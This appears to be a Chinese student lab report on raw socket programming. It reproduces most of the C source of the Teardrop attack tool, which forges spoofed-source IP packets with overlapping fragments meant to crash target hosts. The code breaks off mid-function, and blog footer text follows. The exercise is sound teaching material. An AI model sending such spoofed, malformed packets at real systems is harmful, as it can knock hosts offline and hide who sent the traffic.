Socket编程

一、原始套接字编程

1.1、实验内容

完成“网络编程技术”参考书上 “2.11 原始套接字编程”中的Teardrop代码编程,伪造一个虚假地址的IP包,包的内容填入Fake News。发送此包。并用wireshark抓包进行验证。

1.2、实验过程

1、在Ubuntu下新建文件teardrop.c

gedit teardrop.c

2、写入代码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <errno.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else  
/* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000  /* More IP fragment en route */
#define IPH 0x14    /* IP header size */
#define UDPH 0x8     /* UDP header size */
#define PADDING  0x1c    /* datagram frame padding for first packet */
#define MAGIC  0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT 0x1      /* Linux dies with 1, NT is more stalwart and can
                        * withstand maybe 5 or 10 sometimes...  Experiment.*/
                    

void usage(u_char *);
u_long name_resolve(u_char *);
void send_frags(int, u_long, u_long, u_short, u_short);


int main(int argc, char **argv)
{
   
    int one = 1, count = 0, i, rip_sock;
    // 定义源地址和目的地址
    u_long src_ip = 0, dst_ip = 0;
    // 定义源端口和目的端口
    u_short src_prt = 0, dst_prt = 0;
    // 定义一个32位的IPv4地址
    struct in_addr addr;
    printf("teardrop route|daemon9\n\n");
    //创建原始套接字
    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
   
        fprintf(stderr, "raw socket");
        exit(1);
    }
    //设置套接字选项IP_HDRINCL
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL,
    (char *)&one, sizeof(one))< 0)
    {
   
        fprintf(stderr, "IP_HDRINCL");
        exit(1);
    }
    if (argc < 3)
        usage(argv[0]);
    // 设置源IP 和 目的IP
    if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2])))
    {
   
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }
    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
   
        switch (i)
        {
   
            case 's': // source port (should be emphemeral)
            src_prt = (u_short)atoi(optarg);
            break;
            case 't': // dest port (DNS, anyone?)
            dst_prt = (u_short)atoi(optarg);
            break;
            case 'n': // number to send
            count = atoi(optarg);
            break;
            default :
            usage(argv[0]);
            break; // NOTREACHED
        }
    }
    srandom((unsigned)(utimes("0",(time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)
    count = COUNT;
    printf("Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    printf(" Amt: %5d\n", count);
    printf("[\n ");
    for (i = 0; i < count; i++)
    {
   
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        // printf("b00m ");
        usleep(500);
    }
    printf("]\n");
    return (0);
}


// 设置 IP 包的内容
void send_frags(int sock, u_long src_ip, u_long dst_ip,u_short src_prt,u_short dst_prt)
{
   
    u_char *packet = NULL, *p_ptr = NULL, *flag = NULL; // packet pointers
    u_char byte; // a byte
    // 套接字地址结构
    struct sockaddr_in sin; /* socket protocol structure */
    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;
    sin.sin_addr.s_addr = dst_ip;
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr = packet;
    flag = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    // IP version and header length
    byte = 0x45;
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2; // IP TOS (skipped)
    // total length
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242); // IP id
    p_ptr += 2;
    //IP frag flags and offset
    *((u_short *)p_ptr) |= FIX(IP_MF);
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40; // IP TTL
    byte = IPPROTO_UDP;
    memcpy
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值